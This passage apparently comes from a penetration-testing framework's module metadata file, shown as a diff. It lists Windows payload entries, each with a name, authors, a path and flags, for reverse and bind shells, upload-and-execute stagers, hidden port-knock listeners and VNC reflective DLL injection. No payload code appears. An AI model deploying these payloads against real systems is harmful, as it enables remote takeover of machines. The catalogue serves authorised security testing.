"windows/shell_hidden_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/shell_reverse_tcp": { - "name": "Windows Command Shell, Reverse TCP Inline", - "fullname": "payload/windows/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "vlad902 ", - "sf " - ], - "description": "Connect back to attacker and spawn a command shell", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/windows/shell_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "windows/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/speak_pwned": { - "name": "Windows Speech API - Say \"You Got Pwned!\"", - "fullname": "payload/windows/speak_pwned", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Berend-Jan \"SkyLined\" Wever " - ], - "description": "Causes the target to say \"You Got Pwned\" via the Windows Speech API", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/windows/speak_pwned.rb", - "is_install_path": true, - "ref_name": "windows/speak_pwned", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/upexec/bind_hidden_ipknock_tcp": { - "name": "Windows Upload/Execute, Hidden Bind Ipknock TCP Stager", - "fullname": "payload/windows/upexec/bind_hidden_ipknock_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "vlad902 ", - "sf ", - "hdm ", - "skape ", - "Borja Merino " - ], - "description": "Uploads an executable and runs it (staged).\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode", - "references": [ - "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb", - "is_install_path": true, - "ref_name": "windows/upexec/bind_hidden_ipknock_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/bind_hidden_ipknock_tcp" - }, - "payload_windows/upexec/bind_hidden_tcp": { - "name": "Windows Upload/Execute, Hidden Bind TCP Stager", - "fullname": "payload/windows/upexec/bind_hidden_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "vlad902 ", - "sf ", - "hdm ", - "skape ", - "Borja Merino " - ], - "description": "Uploads an executable and runs it (staged).\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.", - "references": [ - "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb", - "is_install_path": true, - "ref_name": "windows/upexec/bind_hidden_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/bind_hidden_tcp" - }, - "payload_windows/upexec/bind_ipv6_tcp": { - "name": "Windows Upload/Execute, Bind IPv6 TCP Stager (Windows x86)", - "fullname": "payload/windows/upexec/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "vlad902 ", - "sf ", - "hdm ", - "skape " - ], - "description": "Uploads an executable and runs it (staged).\n\nListen for an IPv6 connection (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp.rb", - "is_install_path": true, - "ref_name": "windows/upexec/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/bind_ipv6_tcp" - }, - "payload_windows/upexec/bind_ipv6_tcp_uuid": { - "name": "Windows Upload/Execute, Bind IPv6 TCP Stager with UUID Support (Windows x86)", - "fullname": "payload/windows/upexec/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "vlad902 ", - "sf ", - "hdm ", - "skape ", - "OJ Reeves" - ], - "description": "Uploads an executable and runs it (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/upexec/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/bind_ipv6_tcp_uuid" - }, - "payload_windows/upexec/bind_named_pipe": { - "name": "Windows Upload/Execute, Windows x86 Bind Named Pipe Stager", - "fullname": "payload/windows/upexec/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "vlad902 ", - "sf ", - "UserExistsError" - ], - "description": "Uploads an executable and runs it (staged).\n\nListen for a pipe connection (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_named_pipe.rb", - "is_install_path": true, - "ref_name": "windows/upexec/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/bind_named_pipe" - }, - "payload_windows/upexec/bind_nonx_tcp": { - "name": "Windows Upload/Execute, Bind TCP Stager (No NX or Win7)", - "fullname": "payload/windows/upexec/bind_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "vlad902 ", - "sf " - ], - "description": "Uploads an executable and runs it (staged).\n\nListen for a connection (No NX)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_nonx_tcp.rb", - "is_install_path": true, - "ref_name": "windows/upexec/bind_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/bind_nonx_tcp" - }, - "payload_windows/upexec/bind_tcp": { - "name": "Windows Upload/Execute, Bind TCP Stager (Windows x86)", - "fullname": "payload/windows/upexec/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "vlad902 ", - "sf ", - "hdm ", - "skape " - ], - "description": "Uploads an executable and runs it (staged).\n\nListen for a connection (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_tcp.rb", - "is_install_path": true, - "ref_name": "windows/upexec/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/bind_tcp" - }, - "payload_windows/upexec/bind_tcp_rc4": { - "name": "Windows Upload/Execute, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/windows/upexec/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "vlad902 ", - "sf ", - "hdm ", - "skape ", - "mihi", - "RageLtMan" - ], - "description": "Uploads an executable and runs it (staged).\n\nListen for a connection", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_tcp_rc4.rb", - "is_install_path": true, - "ref_name": "windows/upexec/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/bind_tcp_rc4" - }, - "payload_windows/upexec/bind_tcp_uuid": { - "name": "Windows Upload/Execute, Bind TCP Stager with UUID Support (Windows x86)", - "fullname": "payload/windows/upexec/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "vlad902 ", - "sf ", - "hdm ", - "OJ Reeves" - ], - "description": "Uploads an executable and runs it (staged).\n\nListen for a connection with UUID Support (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/upexec/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/bind_tcp_uuid" - }, - "payload_windows/upexec/find_tag": { - "name": "Windows Upload/Execute, Find Tag Ordinal Stager", - "fullname": "payload/windows/upexec/find_tag", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "vlad902 ", - "sf ", - "skape " - ], - "description": "Uploads an executable and runs it (staged).\n\nUse an established connection", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/findtag_ord.rb", - "is_install_path": true, - "ref_name": "windows/upexec/find_tag", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/findtag_ord" - }, - "payload_windows/upexec/reverse_ipv6_tcp": { - "name": "Windows Upload/Execute, Reverse TCP Stager (IPv6)", - "fullname": "payload/windows/upexec/reverse_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "vlad902 ", - "sf ", - "hdm ", - "skape " - ], - "description": "Uploads an executable and runs it (staged).\n\nConnect back to the attacker over IPv6", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb", - "is_install_path": true, - "ref_name": "windows/upexec/reverse_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/reverse_ipv6_tcp" - }, - "payload_windows/upexec/reverse_nonx_tcp": { - "name": "Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)", - "fullname": "payload/windows/upexec/reverse_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "vlad902 ", - "sf " - ], - "description": "Uploads an executable and runs it (staged).\n\nConnect back to the attacker (No NX)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_nonx_tcp.rb", - "is_install_path": true, - "ref_name": "windows/upexec/reverse_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/reverse_nonx_tcp" - }, - "payload_windows/upexec/reverse_ord_tcp": { - "name": "Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)", - "fullname": "payload/windows/upexec/reverse_ord_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "vlad902 ", - "sf ", - "spoonm " - ], - "description": "Uploads an executable and runs it (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_ord_tcp.rb", - "is_install_path": true, - "ref_name": "windows/upexec/reverse_ord_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/reverse_ord_tcp" - }, - "payload_windows/upexec/reverse_tcp": { - "name": "Windows Upload/Execute, Reverse TCP Stager", - "fullname": "payload/windows/upexec/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "vlad902 ", - "sf ", - "hdm ", - "skape " - ], - "description": "Uploads an executable and runs it (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "windows/upexec/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/reverse_tcp" - }, - "payload_windows/upexec/reverse_tcp_allports": { - "name": "Windows Upload/Execute, Reverse All-Port TCP Stager", - "fullname": "payload/windows/upexec/reverse_tcp_allports", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "vlad902 ", - "sf ", - "hdm ", - "skape " - ], - "description": "Uploads an executable and runs it (staged).\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_allports.rb", - "is_install_path": true, - "ref_name": "windows/upexec/reverse_tcp_allports", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/reverse_tcp_allports" - }, - "payload_windows/upexec/reverse_tcp_dns": { - "name": "Windows Upload/Execute, Reverse TCP Stager (DNS)", - "fullname": "payload/windows/upexec/reverse_tcp_dns", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "vlad902 ", - "sf ", - "hdm ", - "skape ", - "RageLtMan" - ], - "description": "Uploads an executable and runs it (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_dns.rb", - "is_install_path": true, - "ref_name": "windows/upexec/reverse_tcp_dns", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/reverse_tcp_dns" - }, - "payload_windows/upexec/reverse_tcp_rc4": { - "name": "Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/windows/upexec/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "vlad902 ", - "sf ", - "hdm ", - "skape ", - "mihi", - "RageLtMan" - ], - "description": "Uploads an executable and runs it (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4.rb", - "is_install_path": true, - "ref_name": "windows/upexec/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/reverse_tcp_rc4" - }, - "payload_windows/upexec/reverse_tcp_rc4_dns": { - "name": "Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", - "fullname": "payload/windows/upexec/reverse_tcp_rc4_dns", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "vlad902 ", - "sf ", - "hdm ", - "skape ", - "mihi", - "RageLtMan" - ], - "description": "Uploads an executable and runs it (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", - "is_install_path": true, - "ref_name": "windows/upexec/reverse_tcp_rc4_dns", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/reverse_tcp_rc4_dns" - }, - "payload_windows/upexec/reverse_tcp_uuid": { - "name": "Windows Upload/Execute, Reverse TCP Stager with UUID Support", - "fullname": "payload/windows/upexec/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "vlad902 ", - "sf ", - "hdm ", - "OJ Reeves" - ], - "description": "Uploads an executable and runs it (staged).\n\nConnect back to the attacker with UUID Support", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/upexec/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/reverse_tcp_uuid" - }, - "payload_windows/upexec/reverse_udp": { - "name": "Windows Upload/Execute, Reverse UDP Stager with UUID Support", - "fullname": "payload/windows/upexec/reverse_udp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "vlad902 ", - "sf ", - "RageLtMan " - ], - "description": "Uploads an executable and runs it (staged).\n\nConnect back to the attacker with UUID Support", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_udp.rb", - "is_install_path": true, - "ref_name": "windows/upexec/reverse_udp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/upexec", - "stager_refname": "windows/reverse_udp" - }, - "payload_windows/vncinject/bind_hidden_ipknock_tcp": { - "name": "VNC Server (Reflective Injection), Hidden Bind Ipknock TCP Stager", - "fullname": "payload/windows/vncinject/bind_hidden_ipknock_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm ", - "skape ", - "Borja Merino " - ], - "description": "Inject a VNC Dll via a reflective loader (staged).\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection", - "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb", - "is_install_path": true, - "ref_name": "windows/vncinject/bind_hidden_ipknock_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/bind_hidden_ipknock_tcp" - }, - "payload_windows/vncinject/bind_hidden_tcp": { - "name": "VNC Server (Reflective Injection), Hidden Bind TCP Stager", - "fullname": "payload/windows/vncinject/bind_hidden_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm ", - "skape ", - "Borja Merino " - ], - "description": "Inject a VNC Dll via a reflective loader (staged).\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection", - "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb", - "is_install_path": true, - "ref_name": "windows/vncinject/bind_hidden_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/bind_hidden_tcp" - }, - "payload_windows/vncinject/bind_ipv6_tcp": { - "name": "VNC Server (Reflective Injection), Bind IPv6 TCP Stager (Windows x86)", - "fullname": "payload/windows/vncinject/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm ", - "skape " - ], - "description": "Inject a VNC Dll via a reflective loader (staged).\n\nListen for an IPv6 connection (Windows x86)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp.rb", - "is_install_path": true, - "ref_name": "windows/vncinject/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/bind_ipv6_tcp" - }, - "payload_windows/vncinject/bind_ipv6_tcp_uuid": { - "name": "VNC Server (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)", - "fullname": "payload/windows/vncinject/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm ", - "skape ", - "OJ Reeves" - ], - "description": "Inject a VNC Dll via a reflective loader (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x86)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/vncinject/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/bind_ipv6_tcp_uuid" - }, - "payload_windows/vncinject/bind_named_pipe": { - "name": "VNC Server (Reflective Injection), Windows x86 Bind Named Pipe Stager", - "fullname": "payload/windows/vncinject/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "UserExistsError" - ], - "description": "Inject a VNC Dll via a reflective loader (staged).\n\nListen for a pipe connection (Windows x86)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_named_pipe.rb", - "is_install_path": true, - "ref_name": "windows/vncinject/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/bind_named_pipe" - }, - "payload_windows/vncinject/bind_nonx_tcp": { - "name": "VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)", - "fullname": "payload/windows/vncinject/bind_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "vlad902 " - ], - "description": "Inject a VNC Dll via a reflective loader (staged).\n\nListen for a connection (No NX)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_nonx_tcp.rb", - "is_install_path": true, - "ref_name": "windows/vncinject/bind_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/bind_nonx_tcp" - }, - "payload_windows/vncinject/bind_tcp": { - "name": "VNC Server (Reflective Injection), Bind TCP Stager (Windows x86)", - "fullname": "payload/windows/vncinject/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm ", - "skape " - ], - "description": "Inject a VNC Dll via a reflective loader (staged).\n\nListen for a connection (Windows x86)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_tcp.rb", - "is_install_path": true, - "ref_name": "windows/vncinject/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/bind_tcp" - }, - "payload_windows/vncinject/bind_tcp_rc4": { - "name": "VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/windows/vncinject/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm ", - "skape ", - "mihi", - "RageLtMan" - ], - "description": "Inject a VNC Dll via a reflective loader (staged).\n\nListen for a connection", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_tcp_rc4.rb", - "is_install_path": true, - "ref_name": "windows/vncinject/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": 